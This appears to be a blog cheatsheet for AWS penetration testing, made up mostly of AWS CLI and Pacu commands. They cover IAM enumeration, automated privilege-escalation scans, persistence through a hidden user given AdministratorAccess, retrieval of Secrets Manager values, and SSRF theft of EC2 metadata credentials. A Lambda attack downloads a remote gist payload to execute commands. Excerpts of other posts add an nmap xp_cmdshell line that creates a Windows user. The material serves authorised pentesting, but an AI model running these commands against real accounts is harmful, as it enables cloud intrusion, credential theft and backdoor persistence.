Skip to main content

Cloud Pentest Cheatsheet- AWS CLI

 

Installation and Basic Commands
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

#Login - Enter Client ID and Client_Secret
aws configure

#Login - Create a profile incase you have multiple accounts
aws configure --profile Some_NAME

#Get info about Access_key
aws sts get-caller-identity --profile Some_NAME

#Using Short Term Temp Creds
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2
Exploitation using PACU
#Download and Install PACU
pip3 install -U pacu

#run pacu and create a session
pacu
0
AWS-Pentest

#Create AWS login Session - enter Access & Secret Key
set_keys

#Enum IAM permissions
exec iam__enum_permissions

#List all permission for the logged in user 
whoami

#Enum EC2 Instances
exec ec2__enum

#List all the gathered data
data EC2

#Auto PrivEsc 
exec iam__privesc_scan

Saved Credential Location 
#Windows - filename: credentials
c:\Users\Name\.aws/credentials

#Linux - filename: credentials
/home/username/.aws/credentials 
Important Things to Note 
  • If Access Key starts with AKI, it's a long-term credential
  • if Account Number is present in a policy, its Inline, Customer Created Policy
Enumeration - Users
#List Users
aws iam list-users 

#check if a given user is part of any groups
aws iam list-groups-for-user --user-name UserNameHere

#List AWS Managed Policies for a user
aws iam list-attached-user-policies --user-name UserNameHere

#List Inline Admin Created Policies for a user
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
#List all Groups
aws iam list-groups

#List all users in a given group
aws iam get-group --group-name GroupNameHere

#List all manages policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]

#Lists the names of the inline policies embedded in the specified IAM user : 
aws iam list-user-policies --user-name [user-name]

#List All IAM Roles - Roles can only attached only to a AWS compute resource
aws iam list-roles 

#Lists all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [ role-name]

#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [ role-name]

#List all Policies -Both inline and Managed Policies
aws iam list-policies 

#List Policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>

#Retrieves information about the specified managed policy
#AttachmentCount = Number of Entities this policy is used in
aws iam get-policy --policy-arn [policy-arn]

#Lists information about the versions of the specified manages policy
aws iam list-policy-versions --policy-arn [policy-arn]

#Retrieved information about the specified version of the specified managed policy
aws iam get-policy-version --policy-arn policy-arn --version-id [version-id]

#Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role 
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]
Simple Cheatsheet

#List your permissions - get ARN
aws sts get-caller-identity

#discover what else you can do, the IAM Policy Simulator is your best tool
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "ec2:DescribeInstances" "ec2:DescribeSubnets" "ec2:DescribeSecurityGroups"

#Check if you have any IAM permissions assigned to you 
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "iam:ListUsers" "iam:ListRoles" "iam:GetPolicy"

#List user policies
aws iam list-user-policies --user-name UserNameHere

#Check for Inline Policies 
aws iam get-user-policy --user-name lambdazen --policy-name <policy-name-from-previous-command>

#Check for Group Membership
aws iam list-groups-for-user --user-name lambdazen

#List the group's attached policies:
aws iam list-attached-group-policies --group-name <group-name>

#List the group's inline policies:
aws iam list-group-policies --group-name <group-name>

#Check for Resource-Based Policies
aws s3api get-bucket-policy --bucket <the-bucket-name-you-can-access>

Persistence 

# Create the new user
aws iam create-user --user-name <new-hidden-user>

# Attach the same AdministratorAccess policy
aws iam attach-user-policy --user-name <new-hidden-user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Create a new access key for your hidden user. Save this output securely.
aws iam create-access-key --user-name <new-hidden-user>

#AWS Console Access
aws iam create-login-profile --user-name <user-name> --password "YourSuperSecureP@ssw0rd!" --password-reset-required
Enumeration - Instances & Other Services
#List all EC2 Instances in default region
#Lists Keypair name, Public/Private IP
#Try to access the Public Endpoints - try to exploit them 
#Check roles
aws ec2 describe-instances

#list only required details 
aws ec2 describe-instances \
  --filters "Name=instance-state-name,Values=running,stopped" \
  --query "Reservations[*].Instances[*].{Name: (Tags[?Key=='Name'].Value | [0]), Hostname: PrivateDnsName, Status: State.Name, PrivateIP: PrivateIpAddress, PublicIP: PublicIpAddress}" \
  --output table


#Example - retrieve EC2 Temp Creds if a Server is Public and is vuln to SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
S3 Bucket

#OSINT Enum - Find S3 Buckets
cloud_enum -k Bucket_Company_Name

#list all buckets
aws s3 ls

#Download Unauthenticated S3 Bucket files
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> --region us-east-2 --no-sign-request

#List S3 Bucket Contents
aws s3 ls s3://Bucket_name

#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/fil

#List the items in a given bucket excluding mp4 files
aws s3 ls s3://bucketname/ --recursive --summarize --exclude "*.mp4"

#Exclude a directory and list
aws s3 ls s3://bucketname/ --recursive --summarize \
  --exclude "archived-logs/*" \
  --exclude "temp-uploads/*" \
  --exclude "user-avatars/*"

#Download a bucket recursively excluding a directory 
aws s3 cp s3://bucketname/ . --recursive --exclude "archived-logs/*"

#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path 

#Delte a file on S3 Bucket
aws s3 rm s3://Bucket_name/file/path 
Cloudwatch 

#Get S3 Bucket size/metrics using Cloud watch
aws cloudwatch get-metric-statistics \
    --namespace AWS/S3 \
    --metric-name BucketSizeBytes \
    --dimensions Name=BucketName,Value=BucketNameHERE Name=StorageType,Value=StandardStorage \
    --start-time $(date -u -d '2 days ago' +'%Y-%m-%dT%H:%M:%SZ') \
    --end-time $(date -u +'%Y-%m-%dT%H:%M:%SZ') \
    --period 86400 \
    --statistics Average
Database Enumeration

#RDS
aws rds describe-db-instances

#DynamoDB
aws dynamodb list-tables

#Redshift Clusters
aws redshift describe-clusters

#DocumentDB Clusters
aws rds describe-db-clusters --filter Name=engine,Values=docdb
Secrets Manager & Key Vault

#List secrets
aws secretsmanager list-secrets

#List a specific Secret
aws secretsmanager get-secret-value --secret-id <secret-name-or-arn>


#List keys
aws kms list-keys

#List a given key
aws kms describe-key --key-id <key-id-or-alias-name>

#Check the Key Policy
aws kms get-key-policy --key-id <key-id> --policy-name default
Exploit if the User has Lambda Read/Write/Invoke Permissions

Action:
  - 'Lambda:CreateFunction'
  - 'Lambda:InvokeFunction'

#List existing functions 
aws lambda list-functions

#get an existing function
aws lambda get-function --function-name <Func_Name>

#create a file named lambda_function.py
wget https://gist.githubusercontent.com/Bhanunamikaze/bf121677e9ffa3b1d8bd09e90426a283/raw/b11d4942dac11ef6d00374f4b2acd2ebeafc0355/lambda_function.py

#zip the file 
zip function.zip lambda_function.py

#check if a given user is part of any groups
#take the rolename 
aws iam list-groups-for-user --user-name UserNameHere

#Create a Lambda Function
#add  --endpoint-url 'http://domain.local' if required
aws lambda create-function --function-name test3 \
  --runtime python3.8 \
  --role arn:aws:iam::000000000000:role/<RoleNameHere> \
  --handler lambda_function.lambda_handler \
  --zip-file fileb://function.zip

#Create a payload file - payload.json; update the command as required
{"cmd": "ls"}

#invoke the function
aws lambda invoke --function-name test3 --payload fileb://payload.json output.json && cat output.json

#output of the command execution is stored in output.json file



Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...

Host and Application locally and access it over the internet via ngrock

 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...

Cloud Pentest Cheatsheet - Azure

Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...